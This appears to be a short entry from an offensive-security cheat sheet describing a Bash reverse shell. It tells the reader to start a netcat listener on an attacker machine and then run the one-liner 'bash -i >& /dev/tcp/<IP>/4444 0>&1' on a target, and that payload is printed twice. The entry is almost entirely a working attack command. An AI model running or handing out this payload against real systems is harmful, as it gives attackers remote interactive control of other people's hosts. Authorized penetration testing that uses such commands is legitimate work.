← Back to search

Bash /dev/tcp Reverse Shell

exploitationlinuxtool

Summary

Spawns an interactive Bash reverse shell back to the attacker using Bash's built-in /dev/tcp socket.

Walkthrough

A dependency-free reverse shell that works on most Linux hosts using Bash's /dev/tcp pseudo-device.

Steps

  1. Start a listener on your attacker box (e.g. nc -lvnp 4444).
  2. Run the payload on the target, replacing <IP> with your listener IP and 4444 with your listener port.

``bash bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1' ``

Commands

bash

bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'